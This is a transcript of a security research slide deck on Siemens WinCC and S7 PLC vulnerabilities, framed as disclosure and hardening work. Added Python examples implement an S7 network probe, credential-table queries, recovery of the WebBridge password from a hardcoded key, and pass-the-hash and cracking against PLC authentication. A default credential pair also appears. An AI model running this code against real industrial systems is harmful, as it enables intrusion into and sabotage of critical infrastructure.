SCADA StrangeLove

Transcript

  • 1. All pictures are taken from the Dr. Strangelove movie.
  • 2. Group of security researchers focused on ICS/SCADA, to save Humanity from industrial disaster and to keep Purity of Essence: Sergey Gordeychik, Gleb Gritsai, Denis Baranov, Roman Ilin, Ilya Karpov, Sergey Bobrov, Artem Chaykin, Yuriy Dyachenko, Sergey Drozdov, Dmitry Efanov, Yuri Goltsev, Vladimir Kochetkov, Andrey Medov, Sergey Scherbel, Timur Yunusov, Alexander Zaitsev, Dmitry Serebryannikov, Dmitry Nagibin, Dmitry Sklyarov, Alexander Timorin, Vyacheslav Egoshin, Alexander Tlyapov.
  • 3. Goal: to automate security assessment of ICS platforms and environments. Objectives: to understand the system; to assess built-in security features; to create security audit/hardening guides; to automate the process. Vulnerabilities are the waste product of this work, not its goal.
  • 4. Goal: to create a PoC of a Stuxnet-style attack. Initial conditions: common ICS components and configuration; common ICS security tools; only weaknesses of the ICS components themselves; vulnerabilities found by the SCADA StrangeLove team.
  • 5. Engineering tools: STEP 7, PCS 7, TIA Portal. SCADA/HMI: WinCC (Windows), WinCC Flexible/Advanced (Windows/Win CE). S7 family PLCs: old line (200, 300, 400), new line (1200, 1500).
  • 6. WinCC Server: Windows/MSSQL-based SCADA. WinCC Client (HMI): WinCC runtime + Project + OPC. WinCC Web Server (WebNavigator): IIS/MSSQL/ASP/ASP.NET/SOAP. WinCC WebClient (HMI): ActiveX/HTML/JS.
  • 7. [Chart: number of vulnerabilities per year, 1997 to 2013; the bar values did not survive extraction.]
  • 8. Cyber Weapon. Tactics, Techniques, and Procedures (TTPs). APT1, APT 2.0. Cyber Kill Chain.
  • 9. ChinJa (R) (tm): Breaking through, Harvesting, Creeping death, Chaos.
  • 10. That is a question!
  • 11. http://bit.ly/RI6FtQ http://bit.ly/UXn7d1
  • 12. http://www.surfpatrol.ru/en/report
  • 13. A lot of “WinCCed” IE instances from various countries/companies/industries. Special prize to the guys from the US for running WinCC 6.X in 2012.
  • 14. XPath Injection (CVE-2012-2596); Path Traversal (CVE-2012-2597); XSS, ~20 instances (CVE-2012-2595). Fixed in Update 2 for WinCC V7.0 SP3: http://support.automation.siemens.com/WW/view/en/60984587
  • 15. Lots of XSS and CSRF (CVE-2012-3031, CVE-2012-3028); lots of arbitrary file reading (CVE-2012-3030); SQL injection over SOAP (CVE-2012-3032); username and password disclosure via ActiveX abuse (CVE-2012-3034). Fixed in Update 3 for WinCC V7.0 SP3: http://support.automation.siemens.com/WW/view/en/63472422
  • 16. Path Traversal (CVE-2013-0679); Buffer overflow in ActiveX (CVE-2013-0674); XXE OOB (CVE-2013-0677); Missing encryption of sensitive data (CVE-2013-0678); Improper authorization (CVE-2013-0676). Fixed in WinCC 7.2 / SIMATIC PCS 7 V8.0 SP1: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-714398.pdf
  • 17. Network-level. Active scan: S7, Modbus, MSSQL (WinCC instance), HTTP(S), SNMP (public/private community strings hardcoded in PLCs and HMI panels). Passive scan: Profinet. Host-level: WinCC forensics.
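The active S7 probe from the slide above, as an added example (this is not the team's PLCScan code): an ISO-on-TCP connect followed by an S7comm "Setup communication" request, with the parser for both replies. Byte layouts follow the public TPKT (RFC 1006), COTP (ISO 8073) and S7comm descriptions; the TSAP values, rack/slot defaults and the two constructed replies at the bottom are illustrative, not real captures.

```python
"""Active S7comm probe: ISO-on-TCP connect plus Setup Communication (added example, not PLCScan)."""
import socket
import struct

S7_PORT = 102


def tpkt(payload: bytes) -> bytes:
    """TPKT header: version 3, reserved 0, 16-bit total length including the header."""
    return struct.pack(">BBH", 3, 0, 4 + len(payload)) + payload


def build_cotp_cr(rack: int = 0, slot: int = 2, src_tsap: int = 0x0100) -> bytes:
    """COTP Connection Request; the called TSAP encodes rack/slot of the target CPU."""
    dst_tsap = 0x0100 | (rack << 5) | slot
    cotp = (b"\xe0"                                      # PDU type: CR
            + b"\x00\x00" + b"\x00\x01" + b"\x00"        # dst ref, src ref, class 0
            + b"\xc1\x02" + struct.pack(">H", src_tsap)  # calling TSAP
            + b"\xc2\x02" + struct.pack(">H", dst_tsap)  # called TSAP
            + b"\xc0\x01\x0a")                           # TPDU size 2^10
    return tpkt(bytes([len(cotp)]) + cotp)


def parse_cotp_cc(reply: bytes) -> bool:
    """True only for a well-formed TPKT carrying a COTP Connection Confirm (0xD0)."""
    if len(reply) < 7 or reply[0] != 3:
        return False
    if struct.unpack(">H", reply[2:4])[0] != len(reply):
        return False
    return reply[5] == 0xD0


def build_s7_setup(pdu_len: int = 480) -> bytes:
    """S7comm Job 'Setup communication' inside a COTP Data TPDU (02 f0 80)."""
    params = b"\xf0\x00" + struct.pack(">HHH", 1, 1, pdu_len)  # max AMQ calling/called, PDU size
    header = b"\x32\x01\x00\x00\x00\x01" + struct.pack(">HH", len(params), 0)
    return tpkt(b"\x02\xf0\x80" + header + params)


def parse_s7_setup_ack(reply: bytes) -> dict:
    """Decode the Ack_Data (ROSCTR 3) reply; raise if the PLC reports an error."""
    s7 = reply[7:]                                   # skip TPKT (4) + COTP DT (3)
    if len(s7) < 12 or s7[0] != 0x32 or s7[1] != 0x03:
        raise ValueError("not an S7 Ack_Data PDU")
    param_len = struct.unpack(">H", s7[6:8])[0]
    err_class, err_code = s7[10], s7[11]
    params = s7[12:12 + param_len]
    if err_class or err_code or params[:1] != b"\xf0":
        raise ValueError(f"setup rejected: class={err_class:#x} code={err_code:#x}")
    amq_calling, amq_called, pdu_len = struct.unpack(">HHH", params[2:8])
    return {"pdu_length": pdu_len, "amq_calling": amq_calling, "amq_called": amq_called}


def probe(host: str, port: int = S7_PORT, rack: int = 0, slot: int = 2, timeout: float = 3.0) -> dict:
    """Live probe (network I/O): a negotiated PDU size proves an S7 endpoint on host:port."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_cotp_cr(rack, slot))
        if not parse_cotp_cc(s.recv(1024)):
            raise ConnectionError("no COTP Connection Confirm (wrong rack/slot?)")
        s.sendall(build_s7_setup())
        return parse_s7_setup_ack(s.recv(1024))


# Constructed replies (not real captures): a CC, and an Ack_Data negotiating 240-byte PDUs.
SAMPLE_CC = bytes.fromhex("0300001611d00001000a00c0010ac1020100c2020102")
SAMPLE_ACK = bytes.fromhex("0300001b02f080320300000001000800000000f0000001000100f0")

if __name__ == "__main__":
    print("CC accepted:", parse_cotp_cc(SAMPLE_CC))
    print("negotiated:", parse_s7_setup_ack(SAMPLE_ACK))
```

A CPU that answers the CR with a CC and then negotiates a PDU size is an S7 endpoint regardless of what a port scanner labels TCP/102; a CR that is silently dropped usually means the called TSAP (rack/slot) is wrong, so a scanner should retry a few slot values before concluding the port is not S7.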
  • 18. PLCScan, by Dmitry Efanov: http://scadastrangelove.blogspot.ru/2012/11/plcscan.html
  • 19. Alexander Timorin, PHDays III release.
  • 20. PdlRt.exe: graphic runtime; CCRtsLoader.EXE: loader; s7otbxsx.exe: network. Inter-process communication: RPC, sections (memory-mapped files), \BaseNamedObjects\TCPSharedMm and other interesting stuff.
  • 21. Detecting the active project: HKCU\Software\SIEMENS\WINCC\ControlCenter\Default Settings, values LastOpenPath and LastProject. Detecting the MS SQL database name (timestamp): ArchiveManager\AlarmLogging, ArchiveManager\TagLogging*. Obtaining information from database and system objects.
  • 22. {Hostname}_{Project}_TLG*: TAG data. CC_{Project}_{Timestamp}*: project data and configuration; users, PLCs, privileges.
  • 23. Managed by the UM app; stored in dbo.PW_USER.
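The host-level forensic steps of slides 20 to 23 pulled together into a small triage script, as an added example (not the team's WinCC forensic tooling). It uses the runtime process names, the ControlCenter registry values and the database naming scheme the slides give; the sample process list and database names are constructed, the registry read only works on Windows, and the timestamp suffix is assumed to be digits separated by underscores.

```python
"""WinCC host triage: processes, LastProject, project databases, user table (added example)."""
import re
from typing import Dict, Iterable, Optional

# Slide 21: HKCU key holding LastOpenPath / LastProject.
PROJECT_KEY = r"Software\SIEMENS\WINCC\ControlCenter\Default Settings"
# Slide 20: runtime processes that mark a live WinCC instance.
WINCC_PROCESSES = {"pdlrt.exe", "ccrtsloader.exe", "s7otbxsx.exe"}

# Slide 22 naming scheme. Timestamp format is an assumption (digits and underscores).
DB_PROJECT = re.compile(r"^CC_(?P<project>.+?)_(?P<ts>\d[\d_]*)", re.I)
DB_TAGLOG = re.compile(r"^(?P<host>[^_]+)_(?P<project>.+)_TLG", re.I)


def read_last_project() -> Optional[str]:
    """Windows only: LastProject from HKCU; None when not on Windows or the value is absent."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, PROJECT_KEY) as key:
            return winreg.QueryValueEx(key, "LastProject")[0]
    except OSError:
        return None


def wincc_running(process_names: Iterable[str]) -> bool:
    """True if any of the WinCC runtime processes is in the process list."""
    return any(p.lower() in WINCC_PROCESSES for p in process_names)


def classify_databases(db_names: Iterable[str]) -> Dict[str, dict]:
    """Group MSSQL database names by WinCC project, separating config and tag-log databases."""
    projects: Dict[str, dict] = {}

    def entry(project: str) -> dict:
        return projects.setdefault(project, {"config_dbs": [], "tag_dbs": [], "hosts": set()})

    for name in db_names:
        m = DB_PROJECT.match(name)
        if m:
            entry(m["project"])["config_dbs"].append(name)
            continue
        m = DB_TAGLOG.match(name)
        if m:
            e = entry(m["project"])
            e["tag_dbs"].append(name)
            e["hosts"].add(m["host"])
    return projects


def user_table_query(config_db: str) -> str:
    """Read-only T-SQL for the UM user store (slide 23); the DB name is bracket-quoted."""
    safe = config_db.replace("]", "]]")
    return f"SELECT * FROM [{safe}].dbo.PW_USER;"


# Constructed sample input (not from a real host).
SAMPLE_PROCESSES = ["svchost.exe", "PdlRt.exe", "sqlservr.exe"]
SAMPLE_DATABASES = ["master", "CC_PlantA_13_05_23_10_15_42", "HMI01_PlantA_TLG",
                    "HMI02_PlantA_TLG_2013", "tempdb"]

if __name__ == "__main__":
    print("WinCC runtime active:", wincc_running(SAMPLE_PROCESSES))
    print("LastProject:", read_last_project())
    for project, info in classify_databases(SAMPLE_DATABASES).items():
        print(project, info)
        for db in info["config_dbs"]:
            print("  ", user_table_query(db))
```

The grouping matters because one project can have tag-log databases from several HMI hosts while the CC_ database is where users, PLC connections and privileges live; on an incident that is the database to pull first.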
  • 24. CVE-2013-0676
  • 25. Administrator:ADMINISTRATOR; Avgur2 > Avgur
  • 26. This is my encryption key
  • 27. Select from MS SQL via COM objects. “Special” Windows account. Shortcuts* (* we don't know yet, you know).
  • 28. Authentication via SQL-stored accounts. ServerID magic to get the WebBridge password. Magic is used for SCSWebBridgeX.
  • 29. Too hard for me…
  • 30. Oh! En/c(r)ypt[10]n! ServerID = Base64(RC2(pass, key)), where key = MD5(string hardcoded in the DLL).
  • 31. Not my department password!
  • 32. All other connections use WNUSR for authentication. For authorization the ID parameter is used.
  • 33. Not yet…
  • 34. «Magic» password = MD5(WNUSR_DC92D7179E29.Password). WNUSR_DC92D7179E29.Password is generated during installation and stored in the registry via DPAPI. Good length and charset, but…
  • 35. WinCC clients use a hardcoded account to communicate with the OPC Web bridge. The password for WNUSR_DC92D7179E29 is generated during installation and is probably strong. MD5(WNUSR_.Password) is stored with DPAPI protection. The “encrypted” password for WNUSR_DC* can be obtained by a request to WinCCWebBridge.dll. WNUSR_DC92D7179E29 is the only account used for work with Windows/Database.
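The ServerID construction of slide 30 and the "magic" password of slides 34 and 35, reproduced as an added example to show why a strong generated password does not help here: the RC2 key is MD5 of a constant that ships in the DLL, so anyone with the DLL can decrypt a ServerID obtained from WinCCWebBridge.dll, and the value actually used to authenticate is just an unsalted MD5 of that password. This is not Siemens code; the DLL constant, ECB mode with PKCS#7 padding, the 128-bit effective key length and the sample password are all assumptions. RC2 is implemented here per RFC 2268 so the block needs no third-party package.

```python
"""WinCC WebBridge ServerID obfuscation (added example; RC2 per RFC 2268, not Siemens code)."""
import base64
import hashlib
import struct

PITABLE = bytes.fromhex(   # RFC 2268 pi-derived byte permutation
    "d978f9c419ddb5ed28e9fd794aa0d89dc67e37832b76538e624c6488448bfba2"
    "179a59f587b34f1361456d8d09817d32bd8f40eb86b77b0bf09521225c6b4e82"
    "54d66593ce60b21c7356c014a78cf1dc1275ca1f3bbee4d1423dd430a33cb626"
    "6fbf0eda4669075727f21d9bbc944303f811c7f690ef3ee706c3d52fc8661ed7"
    "08e8eade8052eef784aa72ac354d6a2a961ad2715a1549744b9fd05e0418a4ec"
    "c2e0416e0f51cbcc2491af50a1f47039997c3a8523b8b47afc02365b25559731"
    "2d5dfa98e38a92ae05df2910676cbac9d300e6cfe19ea82c6316013f58e289a9"
    "0d38341bab33ffb0bb480c5fb9b1cd2ec5f3db47e5a59c770aa62068fe7fc1ad")
_SHIFTS = (1, 2, 3, 5)


def rc2_expand(key: bytes, eff_bits: int = 128):
    """RFC 2268 key schedule: 64 little-endian 16-bit subkeys from a 1..128-byte key."""
    T, T8 = len(key), (eff_bits + 7) // 8
    TM = 0xFF >> (8 * T8 - eff_bits)
    L = bytearray(key) + bytearray(128 - T)
    for i in range(T, 128):
        L[i] = PITABLE[(L[i - 1] + L[i - T]) & 0xFF]
    L[128 - T8] = PITABLE[L[128 - T8] & TM]
    for i in range(127 - T8, -1, -1):
        L[i] = PITABLE[L[i + 1] ^ L[i + T8]]
    return [L[2 * i] | (L[2 * i + 1] << 8) for i in range(64)]


def _rol(x, n): return ((x << n) | (x >> (16 - n))) & 0xFFFF
def _ror(x, n): return ((x >> n) | (x << (16 - n))) & 0xFFFF


def rc2_encrypt_block(K, block: bytes) -> bytes:
    """16 mixing rounds, with a mashing round after the 5th and the 11th."""
    R, j = list(struct.unpack("<4H", block)), 0
    for rnd in range(16):
        for i in range(4):
            R[i] = (R[i] + K[j] + (R[i - 1] & R[i - 2]) + (~R[i - 1] & R[i - 3])) & 0xFFFF
            R[i] = _rol(R[i], _SHIFTS[i])
            j += 1
        if rnd in (4, 10):
            for i in range(4):
                R[i] = (R[i] + K[R[i - 1] & 63]) & 0xFFFF
    return struct.pack("<4H", *R)


def rc2_decrypt_block(K, block: bytes) -> bytes:
    """Exact inverse of rc2_encrypt_block (r-mash, then r-mix, in reverse order)."""
    R, j = list(struct.unpack("<4H", block)), 63
    for rnd in range(15, -1, -1):
        if rnd in (4, 10):
            for i in (3, 2, 1, 0):
                R[i] = (R[i] - K[R[i - 1] & 63]) & 0xFFFF
        for i in (3, 2, 1, 0):
            R[i] = _ror(R[i], _SHIFTS[i])
            R[i] = (R[i] - K[j] - (R[i - 1] & R[i - 2]) - (~R[i - 1] & R[i - 3])) & 0xFFFF
            j -= 1
    return struct.pack("<4H", *R)


def _ecb(K, data: bytes, fn) -> bytes:
    return b"".join(fn(K, data[i:i + 8]) for i in range(0, len(data), 8))


def webbridge_key(dll_constant: str):
    """Slide 30: key = MD5(constant hardcoded in the DLL). Anyone with the DLL can derive it."""
    return rc2_expand(hashlib.md5(dll_constant.encode()).digest())


def make_server_id(password: str, dll_constant: str) -> str:
    """Base64(RC2(password, key)); ECB + PKCS#7 padding are assumptions."""
    raw = password.encode()
    pad = 8 - len(raw) % 8
    return base64.b64encode(_ecb(webbridge_key(dll_constant), raw + bytes([pad]) * pad, rc2_encrypt_block)).decode()


def recover_password(server_id: str, dll_constant: str) -> str:
    """What an attacker does with a ServerID fetched from WinCCWebBridge.dll (slide 35)."""
    pt = _ecb(webbridge_key(dll_constant), base64.b64decode(server_id), rc2_decrypt_block)
    return pt[:-pt[-1]].decode()


def magic_password(wnusr_password: str) -> str:
    """Slide 34: the WebBridge 'magic' is an unsalted MD5 of the WNUSR_DC92D7179E29 password."""
    return hashlib.md5(wnusr_password.encode()).hexdigest()
```

The length and charset of the generated password are irrelevant once the key that "protects" it is a function of public data; DPAPI on the stored hash does not help either when the same secret is handed out by a DLL request. A real fix needs a per-installation secret that the client never receives.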
  • 36. …responsible disclosure
  • 37. What is a Project? A collection of ActiveX/COM/.NET objects; event handlers and other code (C/VB); configuration files, XML and other. Can a Project be trusted? Ways to spread malware with a Project?
  • 38. NO! The Project itself is dynamic code. It's easy to patch it “on the fly”. Vulnerabilities in data handlers (CVE-2013-0677). How to abuse? Simplest way: patch the event handlers.
  • 39. Hardcoded SNMP community string (unfixed). Hardcoded S7 PLC CA certificate (Dmitry Sklyarov), http://scadastrangelove.blogspot.com/2012/09/all-your-plc-belong-to-us.html ; Multiple vulnerabilities in the S7-1200 PLC web interface (Dmitry Serebryannikov, Artem Chaykin, Yuri Goltsev, Timur Yunusov): http://www.siemens.com/corporatetechnology/pool/de/forschungsfelder/siemens_security_advisory_ssa-279823.pdf
  • 40/41. Can be protected by a password. Authentication is a simple challenge-response: the password is hashed (SHA-1) on the client (TIA Portal); the server (PLC) provides a 20-byte challenge; the client calculates HMAC-SHA1(challenge, SHA1(password)) as the response.
  • 42. SHA-1(pass) is stored in PLC project files; it can be intercepted during firmware update/project upload; it can be extracted from the project file. SHA-1(pass) vs HMAC-SHA1(challenge, SHA1(pass)): whoever holds the stored hash can compute the response without ever knowing the password.
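The challenge-response of slides 40 to 42 with both sides and both weaknesses, as an added example (not TIA Portal or Siemens code). The HMAC key is taken to be SHA-1(password) and the message the 20-byte challenge, which is my reading of the slide's notation; the password, challenge and word list are constructed.

```python
"""S7 project password protection: pass-the-hash and offline guessing (added example)."""
import hashlib
import hmac
import os
from typing import Iterable, Optional


def password_key(password: str) -> bytes:
    """What TIA Portal stores in the project file: SHA-1 of the password, never the password."""
    return hashlib.sha1(password.encode()).digest()


def plc_challenge() -> bytes:
    """PLC side: 20 random bytes per authentication attempt."""
    return os.urandom(20)


def client_response(key_sha1: bytes, challenge: bytes) -> bytes:
    """Client side: HMAC-SHA1 over the challenge, keyed with SHA-1(password)."""
    return hmac.new(key_sha1, challenge, hashlib.sha1).digest()


def plc_verify(stored_sha1: bytes, challenge: bytes, response: bytes) -> bool:
    """PLC side: recompute with its own copy of SHA-1(password), compare in constant time."""
    return hmac.compare_digest(client_response(stored_sha1, challenge), response)


def login_with_stolen_hash(stolen_sha1: bytes) -> bool:
    """Weakness 1 (slide 42): a SHA-1(pass) lifted from a project file or an intercepted
    upload authenticates directly; the password itself is never needed."""
    ch = plc_challenge()
    return plc_verify(stolen_sha1, ch, client_response(stolen_sha1, ch))


def crack(challenge: bytes, response: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Weakness 2: one sniffed (challenge, response) pair is an offline verifier for
    unsalted, single-iteration SHA-1 guesses, i.e. JtR speed."""
    for guess in wordlist:
        if hmac.compare_digest(client_response(password_key(guess), challenge), response):
            return guess
    return None


# Constructed values (not from a real PLC or capture).
DEMO_PASSWORD = "plc-pass-2013"
DEMO_CHALLENGE = bytes(range(20))
DEMO_RESPONSE = client_response(password_key(DEMO_PASSWORD), DEMO_CHALLENGE)
DEMO_WORDLIST = ["password", "1234", "admin", "siemens", "plc-pass-2013"]

if __name__ == "__main__":
    print("legit login:", plc_verify(password_key(DEMO_PASSWORD), DEMO_CHALLENGE, DEMO_RESPONSE))
    print("pass-the-hash:", login_with_stolen_hash(password_key(DEMO_PASSWORD)))
    print("cracked:", crack(DEMO_CHALLENGE, DEMO_RESPONSE, DEMO_WORDLIST))
```

The challenge stops replay of a captured response, nothing more: the stored SHA-1 is a password-equivalent, so the project file, the engineering workstation and every upload on the wire are as sensitive as the password itself, and the absence of a salt or iteration count makes every captured exchange a cheap cracking target.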
  • 43. Buffer overflow (CVE-2013-0669); Cross-Site Scripting (CVE-2013-0672, CVE-2013-0670, CVE-2013-0668); Directory traversal/Response splitting (CVE-2013-0671); Server-side script injection (CVE-2012-3032). Fixed in WinCC (TIA Portal) V12: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-212483.pdf
  • 44. Profinet scanner; WinCC Harvester 2.0: http://scadastrangelove.blogspot.com/search/label/Releases
  • 45. TIA Portal Security Hardening Guide; S7 protocol password brute-force tool and JtR support; SIMATIC WinCC Security Hardening Guide; PLCScan tool; ICS/SCADA/PLC Google/Shodan Cheat Sheet; SCADA Safety in Numbers: http://scadastrangelove.blogspot.com/search/label/Releases
  • 46. All pictures are taken from the Dr. Strangelove movie.